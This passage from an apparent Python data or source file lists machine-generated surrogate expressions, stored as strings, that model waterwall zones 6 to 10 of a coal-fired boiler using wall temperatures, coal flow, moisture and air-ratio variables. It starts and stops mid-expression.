-22.6501 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.453682 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-0.372273 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_platen[t] \
+0.420252 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-78.644 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-0.548922 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 4] \
+0.782376 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 11] \
+176.927 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
-0.0216351 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+0.521495 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-23.7278 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
-354.669 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-1800.24 * b.wall_temperature_waterwall[t, 4]*b.SR_lf[t] \
+1.00785 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.320146 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 6] \
-36.3443 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-276.22 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
+31986.7 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
-33.1281 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+0.337834 * b.wall_temperature_waterwall[t, 7]*b.secondary_air_inlet.temperature[t] \
-22.6854 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+0.0949332 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_waterwall[t, 10] \
-0.836476 * b.wall_temperature_waterwall[t, 11]*b.secondary_air_inlet.temperature[t] \
-0.524954 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+3.06373 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+424.529 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
-2856.66 * b.wall_temperature_roof[t]*b.SR_lf[t] \
-983765 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-407939 * b.flowrate_coal_raw[t]*b.SR[t] \
-532340 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+744.637 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-24675.1 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+6.59033e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+1.76578e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-14012.2 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+2047.81 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+136654 * b.SR[t]*b.ratio_PA2coal[t] \
-1520.71 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000356587 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000348091 * (b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t])**2 \
-11.5928 * (b.wall_temperature_waterwall[t, 5]*b.SR_lf[t])**2 \
+0.000500883 * (b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t])**2 \
+0.000224347 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
-0.0108347 * (b.wall_temperature_roof[t]*b.ratio_PA2coal[t])**2 \
+46556.5 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+1577.66 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00554362 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+43.5639 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2)",
# NOTE(review): the entries below are machine-generated surrogate expressions,
# stored as strings (later evaluated against a block `b` at time index `t`).
# The numeric coefficients are fitted constants -- do not hand-edit them.
# Each key N appears to correspond to waterwall zone N: entry N carries the
# distinctive higher-order (**2/**3, log) terms in
# b.wall_temperature_waterwall[t, N] -- TODO confirm against the surrogate
# generator that produced this file.
# Zone 6 surrogate (fitted expression in zone wall temperatures, coal flow,
# moisture fraction, SR, SR_lf, secondary-air temperature, PA-to-coal ratio).
6: "(23766.1 * b.wall_temperature_waterwall[t, 1] \
+1109.67 * b.wall_temperature_waterwall[t, 2] \
-411.801 * b.wall_temperature_waterwall[t, 3] \
+1277.07 * b.wall_temperature_waterwall[t, 4] \
+1664.61 * b.wall_temperature_waterwall[t, 5] \
-144143 * b.wall_temperature_waterwall[t, 6] \
+321.352 * b.wall_temperature_waterwall[t, 7] \
+2667.15 * b.wall_temperature_waterwall[t, 8] \
+812.223 * b.wall_temperature_waterwall[t, 9] \
+278.07 * b.wall_temperature_waterwall[t, 10] \
-357.846 * b.wall_temperature_waterwall[t, 11] \
+955.339 * b.wall_temperature_waterwall[t, 12] \
+1101.44 * b.wall_temperature_platen[t] \
-1083.91 * b.wall_temperature_roof[t] \
+1.87747e+06 * b.flowrate_coal_raw[t] \
+6.52201e+07 * b.mf_H2O_coal_raw[t] \
+1.15786e+07 * b.SR[t] \
+78146.6 * b.SR_lf[t] \
+8886.98 * b.secondary_air_inlet.temperature[t] \
+349860 * b.ratio_PA2coal[t] \
-1.03956e+07 * log(b.wall_temperature_waterwall[t, 1]) \
+410736 * log(b.wall_temperature_waterwall[t, 3]) \
+2.84904e+07 * log(b.wall_temperature_waterwall[t, 6]) \
-982762 * log(b.wall_temperature_waterwall[t, 8]) \
-638942 * log(b.wall_temperature_platen[t]) \
+2.51419e+06 * log(b.flowrate_coal_raw[t]) \
-355831 * log(b.mf_H2O_coal_raw[t]) \
-3.22971e+07 * log(b.SR[t]) \
-3.53833e+06 * log(b.secondary_air_inlet.temperature[t]) \
-7.27122e+07 * exp(b.mf_H2O_coal_raw[t]) \
+121.792 * b.wall_temperature_waterwall[t, 6]**2 \
-17167.1 * b.flowrate_coal_raw[t]**2 \
-0.00511324 * b.wall_temperature_waterwall[t, 1]**3 \
-0.0481974 * b.wall_temperature_waterwall[t, 6]**3 \
+74.4938 * b.flowrate_coal_raw[t]**3 \
-0.919796 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
+0.0606529 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 10] \
-46.0797 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.499405 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-181.556 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+116.97 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.393401 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
+0.675614 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 10] \
-753.901 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-2042.45 * b.wall_temperature_waterwall[t, 4]*b.SR_lf[t] \
+2.15852 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.224207 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.275077 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
-620.705 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-99.9039 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
-14.5881 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-534.118 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-1.31088 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-1.41959 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
+177.07 * b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t] \
+0.753534 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+7.17536 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+1.88795 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-83.1177 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-796480 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-1.00571e+06 * b.flowrate_coal_raw[t]*b.SR[t] \
+101563 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+662.665 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-12441.5 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.61179e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-11495.5 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+8.29731e+06 * b.SR[t]*b.SR_lf[t] \
+6537.87 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+160251 * b.SR[t]*b.ratio_PA2coal[t] \
-9390.64 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-957.772 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000819586 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.00102671 * (b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t])**2 \
-2.36557e-06 * (b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t])**2 \
+37045.4 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+3479.38 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00390226 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2)",
# Zone 7 surrogate.
7: "(353.147 * b.wall_temperature_waterwall[t, 1] \
+944.788 * b.wall_temperature_waterwall[t, 2] \
-715.67 * b.wall_temperature_waterwall[t, 3] \
-113.773 * b.wall_temperature_waterwall[t, 4] \
+1714.33 * b.wall_temperature_waterwall[t, 5] \
+1186.75 * b.wall_temperature_waterwall[t, 6] \
-41011.8 * b.wall_temperature_waterwall[t, 7] \
+2313.62 * b.wall_temperature_waterwall[t, 8] \
+1044.74 * b.wall_temperature_waterwall[t, 9] \
-193.394 * b.wall_temperature_waterwall[t, 10] \
-1258.23 * b.wall_temperature_waterwall[t, 11] \
+971.027 * b.wall_temperature_waterwall[t, 12] \
+1359.51 * b.wall_temperature_platen[t] \
-694.308 * b.wall_temperature_roof[t] \
+1.69143e+06 * b.flowrate_coal_raw[t] \
-1.14413e+07 * b.mf_H2O_coal_raw[t] \
+8.24903e+06 * b.SR[t] \
-157814 * b.SR_lf[t] \
+2768.6 * b.secondary_air_inlet.temperature[t] \
+477829 * b.ratio_PA2coal[t] \
+146588 * log(b.wall_temperature_waterwall[t, 1]) \
+581939 * log(b.wall_temperature_waterwall[t, 3]) \
-224896 * log(b.wall_temperature_waterwall[t, 4]) \
-1.10027e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-785548 * log(b.wall_temperature_platen[t]) \
+2.17579e+06 * log(b.flowrate_coal_raw[t]) \
-254748 * log(b.mf_H2O_coal_raw[t]) \
-2.27807e+07 * log(b.SR[t]) \
+59.8201 * b.wall_temperature_waterwall[t, 7]**2 \
-13890.7 * b.flowrate_coal_raw[t]**2 \
-3.2383e+07 * b.mf_H2O_coal_raw[t]**2 \
-0.0319362 * b.wall_temperature_waterwall[t, 7]**3 \
+52.1526 * b.flowrate_coal_raw[t]**3 \
-0.830502 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
+0.226652 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 10] \
-76.2281 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+779.831 * b.wall_temperature_waterwall[t, 1]*b.SR_lf[t] \
-0.348643 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-196.262 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+127.532 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.125889 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
-0.214732 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+0.810439 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 10] \
-698.238 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+1.85785 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.436732 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.407706 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
-4.17827 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-703.956 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-0.85661 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-9.60464 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
-34.2924 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+1107.63 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
+1.26848 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 11] \
-17.4004 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-658.546 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-1.01075 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-2.06046 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
+177.497 * b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t] \
+52.1763 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+0.450986 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+7.72431 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+1.57739 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-173.703 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-718200 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-942875 * b.flowrate_coal_raw[t]*b.SR[t] \
+175527 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+441.476 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-10706.6 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.62442e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-8678.04 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+5.56242e+06 * b.SR[t]*b.SR_lf[t] \
+7113.57 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-9979.24 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-650.626 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00138792 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
-0.00105797 * (b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t])**2 \
+33941.2 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+2634.71 * (b.flowrate_coal_raw[t]*b.SR[t])**2)",
# Zone 8 surrogate.
8: "(30738.3 * b.wall_temperature_waterwall[t, 1] \
+635.315 * b.wall_temperature_waterwall[t, 2] \
-737.628 * b.wall_temperature_waterwall[t, 3] \
+613.096 * b.wall_temperature_waterwall[t, 4] \
+1198.21 * b.wall_temperature_waterwall[t, 5] \
+28980.1 * b.wall_temperature_waterwall[t, 6] \
-86338.9 * b.wall_temperature_waterwall[t, 7] \
-16399.5 * b.wall_temperature_waterwall[t, 8] \
+1028.24 * b.wall_temperature_waterwall[t, 9] \
+288.999 * b.wall_temperature_waterwall[t, 10] \
-1919.18 * b.wall_temperature_waterwall[t, 11] \
+1183.65 * b.wall_temperature_waterwall[t, 12] \
+1613.28 * b.wall_temperature_platen[t] \
-809.056 * b.wall_temperature_roof[t] \
+1.29475e+06 * b.flowrate_coal_raw[t] \
+2.75866e+07 * b.mf_H2O_coal_raw[t] \
+6.67449e+06 * b.SR[t] \
+5.28363e+07 * b.SR_lf[t] \
-3717.86 * b.secondary_air_inlet.temperature[t] \
+385624 * b.ratio_PA2coal[t] \
-1.00557e+07 * log(b.wall_temperature_waterwall[t, 1]) \
+559241 * log(b.wall_temperature_waterwall[t, 3]) \
-1.01411e+07 * log(b.wall_temperature_waterwall[t, 6]) \
+1.14643e+07 * log(b.wall_temperature_waterwall[t, 7]) \
+9.46655e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-894841 * log(b.wall_temperature_platen[t]) \
+1.54449e+06 * log(b.flowrate_coal_raw[t]) \
-122538 * log(b.mf_H2O_coal_raw[t]) \
-1.6811e+07 * log(b.SR[t]) \
-5.55471e+07 * log(b.SR_lf[t]) \
-2.83514e+06 * log(b.secondary_air_inlet.temperature[t]) \
-4.07619e+07 * exp(b.mf_H2O_coal_raw[t]) \
-10.6528 * b.wall_temperature_waterwall[t, 1]**2 \
+0.272176 * b.wall_temperature_waterwall[t, 4]**2 \
-9.34661 * b.wall_temperature_waterwall[t, 6]**2 \
+86.226 * b.wall_temperature_waterwall[t, 7]**2 \
-6869.16 * b.flowrate_coal_raw[t]**2 \
-0.0341736 * b.wall_temperature_waterwall[t, 7]**3 \
-0.908054 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
-64.9931 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.1575 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-145.333 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+124.842 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.652536 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 10] \
-697.56 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-1290.22 * b.wall_temperature_waterwall[t, 4]*b.SR_lf[t] \
+1.54101 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.340243 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.186733 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
+0.264209 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-600.521 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-1.06736 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-8.99471 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+2.71176 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+0.727491 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 11] \
-50.9128 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-666.436 * b.wall_temperature_waterwall[t, 8]*b.SR[t] \
-0.100745 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_waterwall[t, 10] \
-530.861 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-0.824416 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-2.53957 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
+166.069 * b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t] \
+0.638522 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+6.65548 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+1.65814 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-132.374 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-636864 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-703357 * b.flowrate_coal_raw[t]*b.SR[t] \
+191874 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+531.415 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-9232.96 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.59172e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-8594.17 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+3.30615e+06 * b.SR[t]*b.SR_lf[t] \
+6573.55 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-555.335 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00118832 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.846319 * (b.wall_temperature_waterwall[t, 11]*b.SR_lf[t])**2 \
+28243.5 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-834.918 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00281944 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+23.2033 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
# Zone 9 surrogate.
9: "(1554.78 * b.wall_temperature_waterwall[t, 1] \
+292.513 * b.wall_temperature_waterwall[t, 2] \
-686.842 * b.wall_temperature_waterwall[t, 3] \
+504.056 * b.wall_temperature_waterwall[t, 4] \
+1072 * b.wall_temperature_waterwall[t, 5] \
+33410.5 * b.wall_temperature_waterwall[t, 6] \
+52811.6 * b.wall_temperature_waterwall[t, 7] \
+2682.22 * b.wall_temperature_waterwall[t, 8] \
+59476.3 * b.wall_temperature_waterwall[t, 9] \
+1980.99 * b.wall_temperature_waterwall[t, 10] \
-418.882 * b.wall_temperature_waterwall[t, 11] \
+979.077 * b.wall_temperature_waterwall[t, 12] \
+2613.03 * b.wall_temperature_platen[t] \
-325.642 * b.wall_temperature_roof[t] \
+1.11231e+06 * b.flowrate_coal_raw[t] \
+2.63584e+07 * b.mf_H2O_coal_raw[t] \
+5.72152e+06 * b.SR[t] \
+3.15685e+08 * b.SR_lf[t] \
-6126.97 * b.secondary_air_inlet.temperature[t] \
-349285 * b.ratio_PA2coal[t] \
+417256 * log(b.wall_temperature_waterwall[t, 1]) \
+3.53244e+06 * log(b.wall_temperature_waterwall[t, 3]) \
-360670 * log(b.wall_temperature_waterwall[t, 4]) \
+4.18922e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-1.17359e+07 * log(b.wall_temperature_waterwall[t, 6]) \
-1.90854e+07 * log(b.wall_temperature_waterwall[t, 7]) \
-1.19489e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-1.73885e+07 * log(b.wall_temperature_waterwall[t, 9]) \
-848457 * log(b.wall_temperature_waterwall[t, 10]) \
-1.39216e+06 * log(b.wall_temperature_platen[t]) \
+20679.5 * log(b.wall_temperature_roof[t]) \
+1.18208e+06 * log(b.flowrate_coal_raw[t]) \
-138694 * log(b.mf_H2O_coal_raw[t]) \
-3.86313e+06 * log(b.SR[t]) \
-1.78945e+08 * log(b.SR_lf[t]) \
-3.73556e+07 * exp(b.mf_H2O_coal_raw[t]) \
-11.0194 * b.wall_temperature_waterwall[t, 6]**2 \
-17.719 * b.wall_temperature_waterwall[t, 7]**2 \
-26.8571 * b.wall_temperature_waterwall[t, 9]**2 \
-3871.37 * b.flowrate_coal_raw[t]**2 \
-6.88157e+07 * b.SR_lf[t]**2 \
-24.6314 * b.flowrate_coal_raw[t]**3 \
-0.898065 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
-50.8152 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-1.50253 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
-0.176067 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-0.045357 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 12] \
-6290.31 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.0280148 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
-0.0760966 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_platen[t] \
-543.634 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+1.55669 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.462604 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.552709 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
-0.187582 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 11] \
+0.311448 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-9598.22 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-0.893275 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-0.0718352 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_roof[t] \
-7.00461 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
-0.347099 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_waterwall[t, 10] \
+0.986772 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+0.874394 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 11] \
-13.7583 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-0.111941 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_waterwall[t, 10] \
-38.4122 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
-926.033 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-0.719251 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
+0.311257 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+0.973601 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-86.0127 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-573877 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-518729 * b.flowrate_coal_raw[t]*b.SR[t] \
+177185 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+356.318 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-8350.35 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.40375e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-7543.82 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+6147.42 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+695872 * b.SR_lf[t]*b.ratio_PA2coal[t] \
-464.964 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000944236 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+1.68544 * (b.wall_temperature_waterwall[t, 3]*b.SR[t])**2 \
+2.37726 * (b.wall_temperature_waterwall[t, 5]*b.SR[t])**2 \
-2.11316e-05 * (b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t])**2 \
+23969.4 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-2523.54 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+31.1715 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
# Zone 10 surrogate.
10: "(1837.36 * b.wall_temperature_waterwall[t, 1] \
+729.997 * b.wall_temperature_waterwall[t, 2] \
-230.755 * b.wall_temperature_waterwall[t, 3] \
+862.309 * b.wall_temperature_waterwall[t, 4] \
-167.942 * b.wall_temperature_waterwall[t, 5] \
+2060.72 * b.wall_temperature_waterwall[t, 6] \
+47434.8 * b.wall_temperature_waterwall[t, 7] \
+2552 * b.wall_temperature_waterwall[t, 8] \
+2565.36 * b.wall_temperature_waterwall[t, 9] \
+12188 * b.wall_temperature_waterwall[t, 10] \
-383.468 * b.wall_temperature_waterwall[t, 11] \
-125.387 * b.wall_temperature_waterwall[t, 12] \
+5141.33 * b.wall_temperature_platen[t] \
-312.616 * b.wall_temperature_roof[t] \
+1.17132e+06 * b.flowrate_coal_raw[t] \
+4.60141e+07 * b.mf_H2O_coal_raw[t] \
+2.69988e+06 * b.SR[t] \
+2.93429e+08 * b.SR_lf[t] \
-7395.61 * b.secondary_air_inlet.temperature[t] \
+367885 * b.ratio_PA2coal[t] \
-112755 * log(b.wall_temperature_waterwall[t, 1]) \
-816926 * log(b.wall_temperature_waterwall[t, 4]) \
-627025 * log(b.wall_temperature_waterwall[t, 6]) \
-1.72497e+07 * log(b.wall_temperature_waterwall[t, 7]) \
-1.30207e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-833056 * log(b.wall_temperature_waterwall[t, 9]) \
-2.73476e+06 * log(b.wall_temperature_platen[t]) \
+790545 * log(b.flowrate_coal_raw[t]) \
-289014 * log(b.mf_H2O_coal_raw[t]) \
-8.88643e+06 * log(b.SR[t]) \
-1.68062e+08 * log(b.SR_lf[t]) \
-5.5004e+07 * exp(b.mf_H2O_coal_raw[t]) \
-4.59464e+07 * exp(b.SR_lf[t]) \
-15.9244 * b.wall_temperature_waterwall[t, 7]**2 \
-12.4671 * b.wall_temperature_waterwall[t, 10]**2 \
-0.0548467 * b.wall_temperature_platen[t]**2 \
-3084.74 * b.flowrate_coal_raw[t]**2 \
-20.7712 * b.flowrate_coal_raw[t]**3 \
-3.52178 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
